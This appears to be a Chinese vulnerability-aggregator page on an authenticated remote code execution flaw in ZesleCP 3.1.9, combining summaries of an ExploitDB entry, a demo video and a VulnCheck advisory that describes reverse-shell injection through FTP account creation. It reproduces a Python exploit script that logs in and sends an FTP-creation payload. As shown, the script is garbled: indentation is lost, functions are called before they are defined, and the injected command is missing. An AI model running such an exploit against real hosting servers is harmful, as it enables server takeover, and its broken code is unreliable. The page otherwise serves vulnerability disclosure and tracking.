# ZesleCP 3.1.9 认证RCE漏洞
N/A
是否为 Web 类漏洞: 未知
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
标题: ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated) - Multiple webapps Exploit -- 🔗来源链接
标签:exploit
神龙速读:
# 漏洞关键信息
## 基本信息
- **EDB-ID**: 50233
- **CVE**: N/A
- **漏洞名称**: ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)
- **作者**: NUMAN TÜRLE
- **类型**: WEBAPPS
- **平台**: MULTIPLE
- **发布日期**: 2021-08-30
- **易受攻击的应用**: ZesleCP 3.1.9
## 漏洞详情
- **标题**: ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)
- **日期**: 27.08.2021
- **作者**: Numan Türle
- **厂商主页**: https://zeslecp.com/
- **软件链接**: https://zeslecp.com/
- **版本**: <=3.1.9
- **相关视频**: https://www.youtube.com/watch?v=5lTDTEBbVg-0
## 漏洞描述
这是一个针对 ZesleCP 3.1.9 的远程代码执行(RCE)漏洞,需要经过身份验证。攻击者可以通过该漏洞在目标服务器上执行任意代码。
## 漏洞利用脚本
- **脚本语言**: Python
- **脚本用途**: 利用漏洞进行远程代码执行
- **脚本内容**: 包含登录、创建 FTP 账户、发送 payload 等功能
```python
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# ZesleCP - Remote Code Execution (Authenticated)
# Version 3.1.9
# Author: twitter.com/numanturle
args = parser.parse_args()
exploit(args)
def exploit(args):
listen_ip = "0.0.0.0"
listen_port = 1337
session = requests.Session()
target = "https://{}:2087".format(args.host)
username = args.login
password = args.password
print("[+] Target {}".format(target))
login = session.post(target + "/login", verify=False, json={"username": username, "password": password})
login_json = json.loads(login.content)
if login_json["success"]:
session_hand_login = session.cookies.get_dict()
print("[+] Login successfully")
print("[+] Creating FTP account")
ftp_username = "".join(random.choices(string.ascii_lowercase + string.digits, k=10))
print("[+] Username : {}".format(ftp_username))
print("[+] Send payload...")
payload = {
"ftp_user": ftp_username,
"ftp_password": "1337"
}
try:
feth_weblist = session.post(target + "/core/ftp", verify=False, json=payload, timeout=3)
except requests.exceptions.ReadTimeout:
pass
print("[+] Successful")
else:
print("[-] AUTH : Login failed msg: {}".format(login_json["message"]))
if __name__ == "__main__":
init()
```
标题: ZesleCP | Best Linux Hosting Control Panel | CentOS & Ubuntu -- 🔗来源链接
标签:product
神龙速读:
从截图中无法直接获取到关于漏洞的关键信息。但是,可以从产品特点和系统要求推断出可能涉及的安全关注点:
- **系统健康监控**:可能需要关注如何保护监控数据的安全性。
- **Server Config**:配置管理功能可能涉及系统安全设置,需防止未授权更改。
- **Firewall Manager**:防火墙管理功能强大,但配置错误可导致安全漏洞。
- **SSH Keys**:SSH密钥管理需确保密钥的安全存储和使用,防止密钥泄露。
- **Backup Wizard**:备份功能需保护备份数据的完整性和安全性,防止数据泄露或篡改。
- **API Support**:API接口的安全性尤为重要,需防范API调用被滥用或数据被窃取。
标题: ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 ) - YouTube -- 🔗来源链接
标签:exploit
神龙速读:
## 关键漏洞信息
- **视频标题**: ZesleCP - Remote Code Execution
- **发布者**: Numan Turle
- **观看次数**: 654 views
- **发布日期**: 4 years ago
- **描述**: No description has been added to this video
- **评论区信息**:
- @showzhino9026: Wow Nice
从视频标题和内容可以推断,该视频与ZesleCP软件相关,并涉及远程代码执行(Remote Code Execution)的漏洞。
标题: ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated) | Advisories | VulnCheck -- 🔗来源链接
标签:third-party-advisory
神龙速读:
## ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)
### Severity
- **High**
### Date
- **January 15, 2026**
### Affecting
- **ZesleCP <= 3.1.9**
### Common Vulnerabilities and Exposures (CVE)
- **CVE-2021-47794**
### Common Weakness Enumeration (CWE)
- **CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')**
### CVSS Score (Vector String)
- **7.1 (AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)**
### References
- **ExploitDB-50233**
- **ZesleCP Official Website**
- **Exploit Demonstration Video**
### Credit
- **Numan Türlə**
### Description
ZesleCP 3.1.9 contains an authenticated remote code execution vulnerability that allows attackers to create malicious FTP accounts with shell injection payloads. Attackers can exploit the FTP account creation endpoint by injecting a reverse shell command that establishes a network connection to a specified listening host.
暂无评论